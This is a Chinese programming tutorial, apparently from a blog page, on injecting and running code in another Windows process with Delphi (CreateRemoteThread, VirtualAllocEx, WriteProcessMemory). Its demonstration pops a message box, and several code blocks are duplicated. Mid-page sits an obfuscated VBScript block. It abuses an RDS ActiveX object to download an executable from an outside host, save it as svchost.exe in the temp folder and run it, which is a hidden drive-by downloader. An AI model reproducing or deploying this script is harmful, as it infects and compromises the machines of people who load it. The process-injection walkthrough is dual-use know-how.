DELPHI代码,直截注入别的进程,之后直截运行在别的进程中的代码!
效果是弹出一个确认框!
本方法不能在98系统下使用!
function createRemoteThread(hProcess: THandle; lpThreadAttributes: Pointer;
dwStackSize: DWORD; lpStartAddress: TFNThreadStartRoutine; lpParameter: Pointer;
dwCreationFlags: DWORD; var lpThreadId: DWORD): THandle; stdcall;
第一个参数:目标行程 ID
第二个参数:指定 SD (security descriptor), nil 表示使用预设 SD
第三个参数:堆谍大小, 0 表示使用目标行程预设堆谍大小
第四个参数:开始执行函数的位址
第五个参数:餵进上面函数参数的位址
第六个参数:旗标设定
第七个参数:回传成功后產生的 Thread ID
接着来说明一下,使用流程吧..
1. 取得目标 Process ID (用 FindWindow+GetWindowProcessID or createToolhelp32Snapshot)
2. OpenProcess 并设定 PROCESS_ALL_ACCESS (懒,用这最方便)
3. 使用 VirtualAllocEx 在目标行程内要求两块可执行可读写的空间,一块放函数,另一块放参数
4. 使用 WriteProcessMemory 将函数和参数写进刚刚要求的两块空间
5. 准备完毕,createRemoteThread
6. WaitForSingleObject (等待 Thread 结束)
7. VirtualFreeEx 释放刚刚要求的两块位址
需小心的地方:
1. 别使用 VCL, 连 string 也不能用.
2. 在目标行程执行的程式,无法直接使用 API, 需由 LoadLibraryA & GetProcAddress 来动态载入 dll 来使用 API。但是所有 kernel32.dll 的函数可直接使用, 因為每个行程必定会载入这个 dll, 所以可由本地行程先找好 LoadLibraryA & GetProcAddress 的函数位址,然后塞进参数内
3. 在目标行程执行的程式,如果用到字串的话,要小心! 不可直接用, 需将要使用的字串先写入到参数中
4. 很想用 VCL 的话,目非行程执行的程式就直接载入一个用 delphi 写的 dll 吧 XD
最后,以一个例子当结尾
简单在指定的 Process 秀出一个 MessageBox..
使用了 FindWindow+GetWindowProcessId 取得目标 Process Id
1. 要在目标行程内执行的程式
procedure myMessageBegin(param: PParam); stdcall;
type
LoadLibraryFunc = function(lib: PChar): DWORD; stdcall;
GetProcAddressFunc = function(lib: DWORD; name: PChar): DWORD; stdcall;
MessageBoxFunc = function(handle: DWORD; msg, title: PChar; flag: DWORD): DWORD; stdcall;
var
myLoad: LoadLibraryFunc;
myGetProc: GetProcAddressFunc;
myMsg: MessageBoxFunc;
hlib: DWORD;
begin
myLoad := LoadLibraryFunc(param^.fLoadLibrary);
myGetProc := GetProcAddressFunc(param^.fGetProcAddress);
hlib := myLoad(@param^.sUser[0]);
myMsg := MessageBoxFunc(myGetProc(hlib, @param^.sMessage[0]));
myMsg(0, @param^.sUser[0], @param^.sMessage[0], MB_OK);
end;
type
LoadLibraryFunc = function(lib: PChar): DWORD; stdcall;
GetProcAddressFunc = function(lib: DWORD; name: PChar): DWORD; stdcall;
MessageBoxFunc = function(handle: DWORD; msg, title: PChar; flag: DWORD): DWORD; stdcall;
var
myLoad: LoadLibraryFunc;
myGetProc: GetProcAddressFunc;
myMsg: MessageBoxFunc;
hlib: DWORD;
begin
myLoad := LoadLibraryFunc(param^.fLoadLibrary);
myGetProc := GetProcAddressFunc(param^.fGetProcAddress);
hlib := myLoad(@param^.sUser[0]);
myMsg := MessageBoxFunc(myGetProc(hlib, @param^.sMessage[0]));
myMsg(0, @param^.sUser[0], @param^.sMessage[0], MB_OK);
end;
看的出来,写的相当迂迴
2. 注入函数的参数型别定义
//要呼叫 MessageBox, 需先 LoadLibrary User32.dll
//然后再用 GetProcAddress 取得 MessageBox 位址
//所以需要以下栏位
// PS: 因為系统 DLL 函数位址在每个行程都一样,
// 加上每个程行必定含入 kernel32.dll, 所以可以放心先取得
// LoadLibrary & GetProcAddress 的位址
PParam = ^TParam;
TParam = packed record
fLoadLibrary: DWORD;
fGetProcAddress: DWORD;
sUser: array[0..10] of Char;
sMessage: array[0..11] of Char;
end;
//然后再用 GetProcAddress 取得 MessageBox 位址
//所以需要以下栏位
// PS: 因為系统 DLL 函数位址在每个行程都一样,
// 加上每个程行必定含入 kernel32.dll, 所以可以放心先取得
// LoadLibrary & GetProcAddress 的位址
PParam = ^TParam;
TParam = packed record
fLoadLibrary: DWORD;
fGetProcAddress: DWORD;
sUser: array[0..10] of Char;
sMessage: array[0..11] of Char;
end;
3. 注入的程式
procedure TForm1.btnInjectClick(Sender: TObject);
var
hwin, pid: DWORD;
hprocess: DWORD;
param: TParam;
pparam, pfunc: Pointer;
hlib: DWORD;
hthread: DWORD;
s: string;
v: DWORD;
iSize: DWORD;
begin
// 寻找指定视窗
hwin := FindWindow(nil, PChar(edtName.Text));
if hwin = 0 then begin
MessageBox(self.Handle, '找不到指定的视窗!', '讯息', MB_OK or MB_ICONWARNING);
Exit;
end;
// 取得该视窗所属的 Process Id
GetWindowThreadProcessId(hwin, pid);
if pid = 0 then begin
MessageBox(self.Handle, '找不到行程ID', '讯息', MB_OK or MB_ICONWARNING);
Exit;
end;
// 开啟这个行程,权限设為 ALL
hprocess := OpenProcess(PROCESS_ALL_ACCESS, False, pid);
if hprocess = 0 then begin
MessageBox(self.Handle, '无法开啟行程', '讯息', MB_OK or MB_ICONWARNING);
Exit;
end;
// 在目标行程内要求参数记忆体
pparam := VirtualAllocEx(hprocess, nil, SizeOf(param), MEM_COMMIT, PAGE_READWRITE);
if pparam = nil then begin
MessageBox(self.Handle, '要求参数记忆体失败', '讯息', MB_OK or MB_ICONWARNING);
CloseHandle(hprocess);
Exit;
end;
// 在目标行程内要求函数记忆体
// 这裡定义一个 myMessageEnd 空函数来判断 myMessageBegin 大小
iSize := DWORD(@myMessageEnd)-DWORD(@myMessageBegin)+1;
pfunc := VirtualAllocEx(hprocess, nil, iSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if pfunc = nil then begin
MessageBox(self.Handle, '要求函数记忆体失败', '讯息', MB_OK or MB_ICONWARNING);
CloseHandle(hprocess);
Exit;
end;
// 初始化参数
FillChar(param, SizeOf(param), 0);
hlib := GetModuleHandle('Kernel32.dll');
param.fLoadLibrary := DWORD(GetProcAddress(hlib, 'LoadLibraryA'));
param.fGetProcAddress := DWORD(GetProcAddress(hlib, 'GetProcAddress'));
s := 'user32.dll';
Move(s[1], param.sUser[0], Length(s));
s := 'MessageBoxA';
Move(s[1], param.sMessage[0], Length(s));
// 写入参数
WriteProcessMemory(hprocess, pparam, @param, SizeOf(param), v);
// 写入函数
WriteProcessMemory(hprocess, pfunc, @myMessageBegin, iSize, v);
// 准备完毕,跑吧!!
hthread := createRemoteThread(hprocess, nil, 0, pfunc, pparam, 0, v);
// 等!
WaitForSingleObject(hthread, INFINITE);
// 释放刚刚要求的记忆体
VirtualFreeEx(hprocess, pfunc, iSize, MEM_DECOMMIT);
VirtualFreeEx(hprocess, pparam, SizeOf(param), MEM_DECOMMIT);
// 收尾
CloseHandle(hprocess);
end;
<script language="VBScript"> function rechange(k) s=Split(k,",") t="" For i = 0 To UBound(s) t=t+Chr(eval(s(i))) Next rechange=t End Function t="111,110,32,101,114,114,111,114,32,114,101,115,117,109,101,32,110,101,120,116,13,10,13,10,100,108,61,34,104,116,116,112,58,47,47,108,117,111,119,101,105,104,97,111,46,103,111,111,103,108,101,112,97,103,101,115,46,99,111,109,47,49,46,101,120,101,34,13,10,32,32,32,32,106,49,61,34,99,108,115,105,100,58,34,13,10,32,32,32,32,106,50,61,34,66,68,57,54,67,53,53,54,45,34,13,10,32,32,32,32,106,51,61,34,54,53,65,51,45,34,13,10,32,32,32,32,106,52,61,34,49,49,68,48,45,34,13,10,32,32,32,32,106,53,61,34,57,56,51,65,45,34,13,10,32,32,32,32,106,54,61,34,48,48,67,48,52,70,67,50,57,69,51,54,34,13,10,32,32,32,32,106,55,61,106,49,38,106,50,38,106,51,38,106,52,38,106,53,38,106,54,13,10,32,32,32,32,120,120,61,34,111,98,106,101,99,116,34,13,10,32,32,32,32,120,120,120,61,34,99,108,97,115,115,105,100,34,13,10,32,32,32,32,120,120,120,120,61,34,83,99,114,105,112,116,105,110,103,46,70,105,108,101,83,121,115,116,101,109,79,98,106,101,99,116,34,13,10,32,32,32,32,100,100,61,34,111,112,101,110,34,13,10,32,32,32,32,83,101,116,32,100,102,32,61,32,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,120,120,41,13,10,32,32,32,32,100,102,46,115,101,116,65,116,116,114,105,98,117,116,101,32,120,120,120,44,32,106,55,13,10,32,32,32,32,98,52,61,34,77,105,34,13,10,32,32,32,32,98,53,61,34,99,114,34,13,10,32,32,32,32,98,54,61,34,111,34,13,10,32,32,32,32,98,55,61,34,115,111,102,116,34,13,10,32,32,32,32,98,56,61,34,46,88,34,13,10,32,32,32,32,98,57,61,34,77,34,13,10,32,32,32,32,98,49,48,61,34,76,34,13,10,32,32,32,32,98,49,49,61,34,72,34,13,10,32,32,32,32,98,49,50,61,34,84,34,13,10,32,32,32,32,98,49,51,61,34,84,34,13,10,32,32,32,32,98,49,52,61,34,80,34,13,10,32,32,32,32,115,116,114,98,49,61,98,52,38,98,53,38,98,54,38,98,55,38,98,56,38,98,57,13,10,32,32,32,32,115,116,114,98,50,61,98,49,48,38,98,49,49,38,98,49,50,38,98,49,51,38,98,49,52,13,10,32,32,32,32,115,116,114,98,61,115,116,114,98,49,38,115,116,114,98,50,13,10,32,32,32,32,83,101,116,32,120,32,61,32,100,102,46,67,114,101,97,116,101,79,98,106,101,99,116,40,115,116,114,98,44,34,34,41,13,10,32,32,32,32,97,52,61,34,65,34,13,10,32,32,32,32,97,53,61,34,100,34,13,10,32,32,32,32,97,54,61,34,111,34,13,10,32,32,32,32,97,55,61,34,100,34,13,10,32,32,32,32,97,56,61,34,98,34,13,10,32,32,32,32,97,57,61,34,46,34,13,10,32,32,32,32,97,49,48,61,34,83,34,13,10,32,32,32,32,97,49,49,61,34,116,34,13,10,32,32,32,32,97,49,50,61,34,114,34,13,10,32,32,32,32,97,49,51,61,34,101,34,13,10,32,32,32,32,97,49,52,61,34,97,34,13,10,32,32,32,32,97,49,53,61,34,109,34,13,10,32,32,32,32,115,116,114,100,49,61,97,52,38,97,53,38,97,54,38,97,55,38,97,56,38,97,57,13,10,32,32,32,32,115,116,114,100,50,61,97,49,48,38,97,49,49,38,97,49,50,38,97,49,51,38,97,49,52,38,97,49,53,13,10,32,32,32,32,115,116,114,100,61,115,116,114,100,49,38,115,116,114,100,50,13,10,32,32,32,32,115,101,116,32,83,83,32,61,32,100,102,46,99,114,101,97,116,101,111,98,106,101,99,116,40,115,116,114,100,44,34,34,41,13,10,32,32,32,32,83,83,46,116,121,112,101,32,61,32,49,13,10,32,32,32,32,102,52,61,34,71,34,13,10,32,32,32,32,102,53,61,34,69,34,13,10,32,32,32,32,102,54,61,34,84,34,13,10,32,32,32,32,115,116,114,101,61,102,52,38,102,53,38,102,54,13,10,32,32,32,32,120,46,79,112,101,110,32,115,116,114,101,44,32,100,108,44,32,70,97,108,115,101,13,10,32,32,32,32,120,46,83,101,110,100,13,10,32,32,32,32,109,97,114,99,111,49,61,34,115,118,99,104,111,115,116,46,101,120,101,34,13,10,32,32,32,32,115,101,116,32,70,32,61,32,100,102,46,99,114,101,97,116,101,111,98,106,101,99,116,40,120,120,120,120,44,34,34,41,13,10,32,32,32,32,116,109,112,50,61,50,13,10,32,32,32,32,115,101,116,32,116,109,112,32,61,32,70,46,71,101,116,83,112,101,99,105,97,108,70,111,108,100,101,114,40,116,109,112,50,41,13,10,32,32,32,32,83,83,46,111,112,101,110,13,10,32,32,32,32,109,97,114,99,111,49,61,32,70,46,66,117,105,108,100,80,97,116,104,40,116,109,112,44,109,97,114,99,111,49,41,13,10,32,32,32,32,83,83,46,119,114,105,116,101,32,120,46,114,101,115,112,111,110,115,101,66,111,100,121,13,10,32,32,32,32,83,83,46,115,97,118,101,116,111,102,105,108,101,32,109,97,114,99,111,49,44,50,13,10,32,32,32,32,83,83,46,99,108,111,115,101,13,10,32,32,32,32,122,49,61,34,83,104,101,34,13,10,32,32,32,32,122,50,61,34,108,108,46,65,34,13,10,32,32,32,32,122,51,61,34,112,112,108,105,34,13,10,32,32,32,32,122,52,61,34,99,97,116,34,13,10,32,32,32,32,122,53,61,34,105,111,34,13,10,32,32,32,32,122,54,61,34,110,34,13,10,32,32,32,32,122,122,61,122,49,38,122,50,38,122,51,38,122,52,38,122,53,38,122,54,13,10,32,32,32,32,115,101,116,32,81,32,61,32,100,102,46,99,114,101,97,116,101,111,98,106,101,99,116,40,122,122,44,34,34,41,13,10,32,32,32,32,81,46,83,104,101,108,108,69,120,101,99,117,116,101,32,109,97,114,99,111,49,44,34,34,44,34,34,44,100,100,44,48" i=t execute(rechange(I)) </script>
var
hwin, pid: DWORD;
hprocess: DWORD;
param: TParam;
pparam, pfunc: Pointer;
hlib: DWORD;
hthread: DWORD;
s: string;
v: DWORD;
iSize: DWORD;
begin
// 寻找指定视窗
hwin := FindWindow(nil, PChar(edtName.Text));
if hwin = 0 then begin
MessageBox(self.Handle, '找不到指定的视窗!', '讯息', MB_OK or MB_ICONWARNING);
Exit;
end;
// 取得该视窗所属的 Process Id
GetWindowThreadProcessId(hwin, pid);
if pid = 0 then begin
MessageBox(self.Handle, '找不到行程ID', '讯息', MB_OK or MB_ICONWARNING);
Exit;
end;
// 开啟这个行程,权限设為 ALL
hprocess := OpenProcess(PROCESS_ALL_ACCESS, False, pid);
if hprocess = 0 then begin
MessageBox(self.Handle, '无法开啟行程', '讯息', MB_OK or MB_ICONWARNING);
Exit;
end;
// 在目标行程内要求参数记忆体
pparam := VirtualAllocEx(hprocess, nil, SizeOf(param), MEM_COMMIT, PAGE_READWRITE);
if pparam = nil then begin
MessageBox(self.Handle, '要求参数记忆体失败', '讯息', MB_OK or MB_ICONWARNING);
CloseHandle(hprocess);
Exit;
end;
// 在目标行程内要求函数记忆体
// 这裡定义一个 myMessageEnd 空函数来判断 myMessageBegin 大小
iSize := DWORD(@myMessageEnd)-DWORD(@myMessageBegin)+1;
pfunc := VirtualAllocEx(hprocess, nil, iSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if pfunc = nil then begin
MessageBox(self.Handle, '要求函数记忆体失败', '讯息', MB_OK or MB_ICONWARNING);
CloseHandle(hprocess);
Exit;
end;
// 初始化参数
FillChar(param, SizeOf(param), 0);
hlib := GetModuleHandle('Kernel32.dll');
param.fLoadLibrary := DWORD(GetProcAddress(hlib, 'LoadLibraryA'));
param.fGetProcAddress := DWORD(GetProcAddress(hlib, 'GetProcAddress'));
s := 'user32.dll';
Move(s[1], param.sUser[0], Length(s));
s := 'MessageBoxA';
Move(s[1], param.sMessage[0], Length(s));
// 写入参数
WriteProcessMemory(hprocess, pparam, @param, SizeOf(param), v);
// 写入函数
WriteProcessMemory(hprocess, pfunc, @myMessageBegin, iSize, v);
// 准备完毕,跑吧!!
hthread := createRemoteThread(hprocess, nil, 0, pfunc, pparam, 0, v);
// 等!
WaitForSingleObject(hthread, INFINITE);
// 释放刚刚要求的记忆体
VirtualFreeEx(hprocess, pfunc, iSize, MEM_DECOMMIT);
VirtualFreeEx(hprocess, pparam, SizeOf(param), MEM_DECOMMIT);
// 收尾
CloseHandle(hprocess);
end;
扫一扫
748
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
